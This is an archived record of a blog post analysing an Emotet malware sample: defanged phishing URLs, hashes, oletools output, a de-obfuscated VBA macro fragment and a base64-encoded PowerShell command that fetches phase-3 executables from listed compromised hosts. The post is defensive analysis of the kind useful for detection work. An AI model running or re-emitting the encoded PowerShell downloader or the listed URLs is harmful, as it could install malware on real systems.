{
	"id": "30ccaa82-c863-45d6-9ee9-6178c6c75a0a",
	"created_at": "2026-04-06T00:10:28.995981Z",
	"updated_at": "2026-04-10T13:12:08.087118Z",
	"deleted_at": null,
	"sha1_hash": "71035736af68098e95c5085ae6f11bbc28c06816",
	"title": "Emotet malware analysis. Part 1.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 318506,
	"plain_text": "Emotet malware analysis. Part 1.\r\nPublished: 2019-03-17 · Archived: 2026-04-02 10:59:46 UTC\r\nThis is Part 1 of Emotet malware analysis I’m planning to post. It covers phases 1 and 2 of the attack, specifically phishing\r\nand establishing persistence in the infected system. Emotet is spread via phishing emails containing malicious links or\r\nattachments, and targets everyone (individuals, companies and governments).\r\nPhase 1. Malicious email and document.\r\nFirst phase of the attack starts with a Phishing email. Usually subject, layout, attachments and links are modified\r\nperiodically by attackers. In this article I’m going to analyze this sample from VirusTotal.\r\nOne of Emotet’s characteristics is constantly changing content of the phishing emails. Usually these contain a malicious link\r\nor attachment. This article covers the sample which was spread using via following links:\r\nURL\r\nhxxps://www.tenderheartfoundation.org/knqimf/muwcu-xh8fa-vnewt/\r\nhxxp://clyckmedia.com/clientes/ylhq8-zg1ue-iibdnyco/\r\nhxxp://noithathopehome.com/8brl9if/hldd-m2v2fy-xavkpbbl/\r\nhxxp://cllcanada.ca/2010/lmef-jmlr1n-ftkktgp/\r\nhxxp://www.smilefy.com/it3fqqo/rnk6-9mm14-fcnp.view/\r\nhxxp://cadsupportplus.com/assets/nwi2z-20bew-ffuwbfmt/\r\nhxxp://www.sdhjesov.cz/wordpress/papcc-koe6n-lsric.view/\r\nhxxp://bigkidneys.com/42QQXOURJ/gf1lm-hmr0c-lnkcfak/\r\nhxxp://compraventachocados.cl/css/hgkhx-lin1b-zjkebwycv/\r\nhxxp://cruelacid.com/icon/bmza-8dlyf-jemlc/\r\nhxxp://ecommercedefinitivo.com.br/cursos/ryyjt-tnxm7-byxukc/\r\nhxxp://annual.fph.tu.ac.th/wp-content/uploads/ikvv-lt7rlt-bqcnmly/\r\nhxxp://dbtools.com.br/mailer/ezsvr-mqo7i-zgysfrmwr/\r\nhxxp://demu.hu/wp-content/2h2z2-errsh-sxwqgscp/\r\nhttps://persianov.net/emotet-malware-analysis-part-1\r\nPage 1 of 4\n\nURL\r\nhxxp://georgekiser.com/test/z6uwt-r0459s-rqkv.view/\r\nhxxp://wdl.usc.edu/wp-includes/zvlp-s69lox-wrkbb.view/\r\nhxxp://dictionary.me/js/bbrj3-tq4eh-izxcuhnb/\r\nhxxp://duncaninstallation.com/images/u32g-mdxys3-gjcwkz/\r\nhxxp://devpro.ro/misc/3wa1-zykhgf-xcjqnfs/\r\nAll URLs above, once accessed, drop a Microsoft Office Document with macros in it.\r\nChecksum File type File Size\r\nf5e9c63713c7ff968f4958a9b5161e78af05f21493e56555734b89f55b2be24c\r\nMS Word\r\nDocument\r\n246KB (251904\r\nbytes)\r\nAnalysis.\r\nBased on the result we get by running file command against this sample, it looks like this document has 1 page and\r\ndoesn’t contain any words.\r\nf5e9c63713c7ff968f4958a9b5161e78af05f21493e56555734b89f55b2be24c: Composite Document File V2 Document, Little Endian,\r\nOs: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Micros\r\nCreate Time/Date: Mon Mar 11 21:32:00 2019, Last Saved Time/Date: Mon Mar 11 21:32:00 2019, Number of Pages: 1,\r\nNumber of Words: 0, Number of Characters: 5, Security: 0\r\nUsing Oletools to get the list of document’s objects, 3 macros elements have been found:\r\n 7: 74 'Macros/PROJECTwm'\r\n 8: M 70540 'Macros/VBA/S1ADDQ1A'\r\n 9: M 14650 'Macros/VBA/YBB1wA'\r\n 10: 49987 'Macros/VBA/_VBA_PROJECT'\r\n 11: 1344 'Macros/VBA/__SRP_0'\r\n 12: 110 'Macros/VBA/__SRP_1'\r\n 13: 436 'Macros/VBA/__SRP_2'\r\n 14: 187 'Macros/VBA/__SRP_3'\r\n 15: 601 'Macros/VBA/dir'\r\n 16: M 9719 'Macros/VBA/mA4QAX4'\r\n 17: 4096 'WordDocument'\r\nObjects 8, 9 and 16 contain Visual Basic code, thus of higher interest for further analysis.\r\nObject Name Checksum Size\r\n8 S1ADDQ1A 34ffc69ff37401b965b04fa4f3c1fbcdffab11fd2e34f9e17a8347b70922398b\r\n44KB\r\n(44096\r\nbytes)\r\n9 YBB1wA d51c137e3f591a275628e697d2fbb305cc3c630455480508184b45753608d973\r\n8.8KB\r\n(8956\r\nbytes)\r\n16 mA4QAX4 d2e56d56ced7ed8de5f701a873086c8134e1311dd574a607a45023f38d5ecaf7\r\n5.6KB\r\n(5671\r\nbytes)\r\nhttps://persianov.net/emotet-malware-analysis-part-1\r\nPage 2 of 4\n\nOut of all extracted parts of the script, mA4QAX4 is the entry point and starts the execution once the document is opened.\r\nWhole VBS code is obfuscated, as seen in the image below.\r\nAll three parts are dependent on each other and have to be merged, for further analysis. You can find it HERE.\r\nThe call chain looks like this:\r\n1. autoopen();\r\n2. iQwUcAAU(param):\r\nCreates Win32_ProcessStartup class;\r\nCreates an object of the class by calling Create method;\r\nPasses param string as command argument, thus starting the execution;\r\nValue of param consists of concatenated results of following functions: SQoBUAA , vDXBUQ , rDCAQQcA , pAADAADD ,\r\nk1kGUAB , cAABQDw . All these functions are similar in terms of logic and were easy to de-obfuscate. Below is the clean\r\nversion of SQoBUAA :\r\nFunction SQoBUAA()\r\nOn Error Resume Next\r\njkQBUx = \"l -\" + \"nop\" + \" -e\" + \"n\" + \"c\" + \" JA\" + \"BHA\" + \"G\" + \"8Aa\" + \"wB\" + \"HA\" + \"E\" + \"M\" + \"AN\" + \"A\" + \"B\" + \"B\r\nlBADQoU = \"cAe\" + \"gBf\" + \"AC\" + \"cAK\" + \"w\" + \"An\" + \"AEE\" + \"AWg\" + \"AnA\" + \"CsA\" + \"Jw\" + \"Br\" + \"A\" + \"G8A\" + \"RAB\"\r\ntcoAAAAQ = \"B\" + \"ACc\" + \"A\" + \"K\" + \"Q\" + \"A7A\" + \"CQ\" + \"AU\" + \"gBf\" + \"AEE\" + \"A\" + \"a\" + \"w\" + \"AxA\" + \"F8\"\r\nHAQUxA_ = \"AQQ\" + \"BBA\" + \"D0\" + \"Abg\" + \"BlA\" + \"Hc\" + \"ALQ\" + \"BvA\" + \"GI\" + \"Aa\" + \"gBl\" + \"AG\" + \"MAd\" + \"A\" + \"AgA\" +\r\ntUQokAA = \"IA\" + \"Qw\" + \"Bs\" + \"AGk\" + \"AZQ\" + \"Bu\" + \"AH\" + \"Q\" + \"A\" + \"O\" + \"wA\" + \"kAG\" + \"k\" + \"AVQ\" + \"Bv\" + \"AF\" +\r\ncUAAoX = \"d\" + \"AAn\" + \"ACs\" + \"AJw\" + \"B0\" + \"AH\" + \"A\" + \"AOg\" + \"A\" + \"vA\" + \"C8A\" + \"Yg\" + \"B\" + \"pA\" + \"G\" + \"U\" + \"A\r\nAkQG_A = \"A\" + \"Cc\" + \"AKw\" + \"An\" + \"AG\" + \"4AL\" + \"g\" + \"B\" + \"uAG\" + \"UAd\" + \"AA\" + \"vAG\" + \"wA\" + \"ZQB\" + \"zAG\" + \"wA\"\r\nSQoBUAA = jkQBUx + lBADQoU + tcoAAAAQ + HAQUxA_ + tUQokAA + cUAAoX + AkQG_A\r\nEnd Function\r\nPhase 2. Persistent Powershell.\r\nA base64 encoded powershell script is extracted and set to run at system’s startup, by the document macros.\r\npowershell -nop -enc JABHAG8AawBHAEMANABBADQAPQAoACcAegBfACcAKwAnAEEAWgAnACsAJwBrAG8ARABBACcA\r\nKQA7ACQAUgBfAEEAawAxAF8AQQBBAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAVQBvAF8ARABBAD0AKA\r\nnAGgAdAAnACsAJwB0AHAAOgAvAC8AYgBpAGUAZABlAHIAbQBhACcAKwAnAG4ALgBuAGUAdAAvAGwAZQBzAGwAaQBlAC8AbAAnACsAJwBMAC8AJwArACcAQABoA\r\nQAdABwADoALwAnACsAJwAvAG4AaQBzAHMAYQAnACsAJwBuAGIAYQAnACsAJwBjAGcAaQBhACcAKwAnAG4AZwAnACsAJwAuAGMAJwArACcAbwBtAC8AdwBwAC0A\r\nwBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAHgAUgAnACsAJwAzAC8AJwArACcAQAAnACsAJwBoAHQAdAAnACsAJwBwADoALwAnACsAJwAvAGUAcQB1AGkAZAB\r\nAGQAZABlAGcAZQBuAGUAcgAnACsAJwBvAC4AJwArACcAaQB6AHQAJwArACcAYQBjAGEAbABhAC4AdQAnACsAJwBuAGEAbQAuAG0AeAAvACcAKwAnAHcAcAAtAG\r\nAZABtAGkAbgAvACcAKwAnAFgAUABGAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AJwArACcAegAnACsAJwBlAHMAdABlAHYAZQBuAHQAJwArACcAcwAuAGMAb\r\nAvAHcAcAAtACcAKwAnAGkAJwArACcAbgBjAGwAdQBkAGUAcwAvAEcAJwArACcASgBBACcAKwAnAG8ALwBAAGgAdAB0AHAAJwArACcAOgAvAC8AJwArACcAcwB0\r\nHkAJwArACcAbABpACcAKwAnAHMAaABsAGEAYgAuAHcAZQBiAHAAaQB4AGEAYgB5AHQAJwArACcAZQAnACsAJwAuAGMAJwArACcAbwBtAC8AdAAnACsAJwBoAGo\r\nbwB3AHIAawA1ACcAKwAnAGUALwA5AFUARwAvACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAHYAWgBBAEEAQgA0AD0AKAAnAFEAQwBBAEIAJwArACcAQg\r\nBAFUAJwApADsAJABKAFUAQQBrAEEAQQAgAD0AIAAoACcANAA4ACcAKwAnADYAJwApADsAJABGAGsAWgBBAEQAWgBVAD0AKAAnAGoAJwArACcANABfAEEAQQBCA\r\nEAJwApADsAJABtAFEAVQBrAHcARwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASgBVAEEAawBBAEEAKwAoACcALgBlACcA\r\nwAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJAByAEIAQQBCAEQAbwAgAGkAbgAgACQAaQBVAG8AXwBEAEEAKQB7AHQAcgB5AHsAJABSAF8AQQBrADEAXwB\r\nhttps://persianov.net/emotet-malware-analysis-part-1\r\nPage 3 of 4\n\nAEEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAcgBCAEEAQgBEAG8ALAAgACQAbQBRAFUAawB3AEcAKQA7ACQAQwBYAGsAQQBBADQAQQA9ACgAJwBWAD\r\nAQgBBACcAKwAnAEEAawBBACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAG0AUQBVAGsAdwBHACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAN\r\nAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAbQBRAFUAawB3AEcAOwAkAG4ARABBAEEAdwBvAFgAPQAoACcAcwAnACsAJwBvAEEAeABB\r\nEQAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAdwBRAEEAQQBRAHgAPQAoACcARQBCAG8AYwAnACsAJwBBAEEAJwApADsA\r\nOnce decoded, several URLs pop up which drop phase 3 PE files.\r\nTotally there are 5 different websites, hosting Emotet malware.\r\nURL Dropped PE Checksum\r\nhxxp://biederman.net/leslie/lL/ e76900b9b50306564c415423e0eb28463722b0427186134ba301209b4ed2f440\r\nhxxp://nissanbacgiang.com/wp-content/xR3/ 5c2fbc0eaae6ccc8342c22325f0aca1e989beec8d578e3fe57722b807a46c773\r\nhxxp://equidaddegenero.iztacala.unam.mx/wp-admin/XPF/\r\nbc0d53d74f3f4ef286b4f4caeb8d8b77e32cc17b808dd0de5674842ad713dd72\r\nhxxp://stylishlab.webpixabyte.com/thjowrk5e/9UG/ 1c06da405051cfc9f68dbb404e338abb90a38db29f86f17e01487ac2c921c05d\r\nhxxp://www.zestevents.co/wp-includes/GJAo/ 403 HTTP Error\r\nConclusion.\r\nLooks like the group behind Emotet, haven’t focused on heavily obfuscating phase 1 and 2 scripts. Analysis of downloaded\r\nsamples to follow in Part 2 of this article.\r\nSource: https://persianov.net/emotet-malware-analysis-part-1\r\nhttps://persianov.net/emotet-malware-analysis-part-1\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://persianov.net/emotet-malware-analysis-part-1"
	],
	"report_names": [
		"emotet-malware-analysis-part-1"
	],
	"threat_actors": [],
	"ts_created_at": 1775434228,
	"ts_updated_at": 1775826728,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/71035736af68098e95c5085ae6f11bbc28c06816.pdf",
		"text": "https://archive.orkl.eu/71035736af68098e95c5085ae6f11bbc28c06816.txt",
		"img": "https://archive.orkl.eu/71035736af68098e95c5085ae6f11bbc28c06816.jpg"
	}
}